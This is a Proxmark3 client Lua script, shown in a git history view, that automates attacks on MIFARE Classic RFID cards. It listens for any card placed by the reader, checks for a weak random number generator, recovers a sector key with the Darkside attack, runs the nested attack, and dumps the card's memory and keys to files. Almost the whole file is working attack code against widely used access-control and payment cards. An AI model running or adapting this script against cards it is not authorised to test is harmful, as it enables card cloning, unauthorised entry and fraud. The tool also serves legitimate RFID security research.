proxmark3/client/luascripts/hf_mf_autopwn.lua

225 lines
7 KiB
Lua
Raw Normal View History

local getopt = require('getopt')
local lib14a = require('read14a')
local cmds = require('commands')
local utils = require('utils')
2020-04-05 18:41:38 +08:00
local ansicolors = require('ansicolors')
2019-04-29 07:39:40 +08:00
copyright = ''
author = "Martin Holst Swende"
2020-04-05 18:41:38 +08:00
version = 'v1.0.3'
2019-04-29 07:39:40 +08:00
desc = [[
2019-03-09 17:34:43 +08:00
This is a script which automates cracking and dumping mifare classic cards. It sets itself into
'listening'-mode, after which it cracks and dumps any mifare classic card that you
place by the device.
2019-04-29 07:39:40 +08:00
]]
example = [[
1. script run hf_mf_autopwn
2019-04-29 07:39:40 +08:00
]]
usage = [[
script run hf_mf_autopwn [-h] [-d] [-k <key>]
2020-04-05 18:41:38 +08:00
]]
arguments = [[
2019-03-09 17:34:43 +08:00
-h this help
-d debug logging on
-k known key for Sector 0 , keytype A
Output files from this operation:
2019-03-09 17:34:43 +08:00
<uid>.eml - emulator file
<uid>.html - html file containing card data
dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
]]
-------------------------------
2019-03-09 17:34:43 +08:00
-- Some utilities
-------------------------------
local DEBUG = false
2019-03-09 17:34:43 +08:00
---
-- A debug printout-function
local function dbg(args)
2019-03-09 17:34:43 +08:00
if not DEBUG then return end
if type(args) == 'table' then
local i = 1
while result[i] do
dbg(result[i])
i = i+1
end
else
print('###', args)
end
end
---
-- This is only meant to be used when errors occur
local function oops(err)
2019-04-29 07:39:40 +08:00
print('ERROR:', err)
core.clearCommandBuffer()
return nil, err
end
2019-03-09 17:34:43 +08:00
---
-- Usage help
local function help()
2019-04-29 07:39:40 +08:00
print(copyright)
print(author)
print(version)
2019-03-09 17:34:43 +08:00
print(desc)
2020-04-05 18:41:38 +08:00
print(ansicolors.cyan..'Usage'..ansicolors.reset)
2019-04-29 07:39:40 +08:00
print(usage)
2020-04-05 18:41:38 +08:00
print(ansicolors.cyan..'Arguments'..ansicolors.reset)
print(arguments)
print(ansicolors.cyan..'Example usage'..ansicolors.reset)
print(example)
end
---
2019-03-09 17:34:43 +08:00
-- Waits for a mifare card to be placed within the vicinity of the reader.
-- @return if successful: an table containing card info
-- @return if unsuccessful : nil, error
local function wait_for_mifare()
while not core.kbd_enter_pressed() do
2019-03-09 17:34:43 +08:00
res, err = lib14a.read()
if res then return res end
-- err means that there was no response from card
end
2019-04-29 07:39:40 +08:00
return nil, 'Aborted by user'
end
local function nested(key,sak)
2019-03-09 17:34:43 +08:00
local typ = 1
if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k
typ = 4
elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k | Ev1 1K
typ = 1
elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
typ = 0
elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
typ = 2
elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
typ = 1
else
print("I don't know how many sectors there are on this type of card, defaulting to 16")
end
2019-04-29 07:39:40 +08:00
local cmd = string.format('hf mf nested %d 0 A %s d', typ, key)
2019-03-09 17:34:43 +08:00
core.console(cmd)
end
local function dump_tag(uid, numsectors)
2019-03-09 17:34:43 +08:00
dbg('dumping tag memory')
local typ = 1
if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k
typ = 4
elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k | Ev1 1K
typ = 1
elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
typ = 0
elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
typ = 2
elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
typ = 1
end
if utils.confirm('Do you wish to create a memory dump of tag?') then
local dumpfile = 'hf-mf-'..uid..'-dump'
2019-03-09 17:34:43 +08:00
local dmp = ('hf mf dump %s f %s'):format(typ, dumpfile)
core.console(dmp)
-- Save the global args, those are *our* arguments
local myargs = args
2020-09-23 07:00:05 +08:00
-- Set the arguments for data_mf_bin2html script
args =('-i %s.bin -o %s.html'):format(dumpfile, dumpfile)
2019-03-09 17:34:43 +08:00
-- call it
2020-09-23 07:00:05 +08:00
require('data_mf_bin2html')
2019-03-09 17:34:43 +08:00
-- Set back args. Not that it's used, just for the karma...
args = myargs
end
end
--
-- performs a test if tag nonce uses weak or hardend prng
local function perform_prng_test()
2019-03-09 17:34:43 +08:00
local isweak = core.detect_prng()
if isweak == 1 then
dbg('PRNG detection : WEAK nonce detected')
elseif isweak == 0 then
dbg('PRNG detection : HARDEND nonce detected')
else
dbg('PRNG detection : failed')
end
return isweak
end
2019-03-09 17:34:43 +08:00
---
-- The main entry point
local function main(args)
2019-05-08 05:46:37 +08:00
local verbose, _exit, res, uid, err, _, sak
2019-03-09 17:34:43 +08:00
local seen_uids = {}
local key = ''
local print_message = true
-- Read the parameters
for o, a in getopt.getopt(args, 'hdk:') do
2019-04-29 07:39:40 +08:00
if o == 'h' then help() return end
if o == 'd' then DEBUG = true end
2019-03-09 17:34:43 +08:00
if o == 'k' then key = a end
end
2019-05-08 05:46:37 +08:00
while not _exit do
2019-03-09 17:34:43 +08:00
if print_message then
print('Waiting for card or press Enter to stop')
2019-03-09 17:34:43 +08:00
print_message = false
end
res, err = wait_for_mifare()
if err then return oops(err) end
-- Seen already?
uid = res.uid
sak = res.sak
if not seen_uids[uid] then
-- Store it
seen_uids[uid] = uid
-- check if PRNG is WEAK
if perform_prng_test() == 1 then
2019-04-29 07:39:40 +08:00
print('Card found, commencing crack on UID', uid)
2019-03-09 17:34:43 +08:00
if #key == 12 then
2019-04-29 07:39:40 +08:00
print('Using key: '..key);
2019-03-09 17:34:43 +08:00
else
-- Crack it
local cnt
err, res = core.mfDarkside()
2019-04-29 07:39:40 +08:00
if err == -1 then return oops('Button pressed. Aborted.')
elseif err == -2 then return oops([[Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).]])
elseif err == -3 then return oops([[Card is not vulnerable to Darkside attack (its random number generator is not predictable).]])
2019-03-09 17:34:43 +08:00
elseif err == -4 then return oops([[
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
2019-04-29 07:39:40 +08:00
elseif err == -5 then return oops('Aborted via keyboard.')
2019-03-09 17:34:43 +08:00
end
-- The key is actually 8 bytes, so a
-- 6-byte key is sent as 00XXXXXX
-- This means we unpack it as first
-- two bytes, then six bytes actual key data
-- We can discard first and second return values
2019-04-29 07:39:40 +08:00
_,_,key = bin.unpack('H2H6',res)
print('Found valid key: '..key);
2019-03-09 17:34:43 +08:00
end
-- Use nested attack
nested(key, sak)
-- Dump info
dump_tag(uid, sak)
2019-03-09 17:34:43 +08:00
2019-05-08 05:46:37 +08:00
if #key == 12 then _exit = true end
2019-03-09 17:34:43 +08:00
else
2019-04-29 07:39:40 +08:00
print('Card found, darkside attack useless PRNG hardend on UID', uid)
2019-03-09 17:34:43 +08:00
end
print_message = true
end
end
end
2019-03-09 17:34:43 +08:00
-- Call the main
main(args)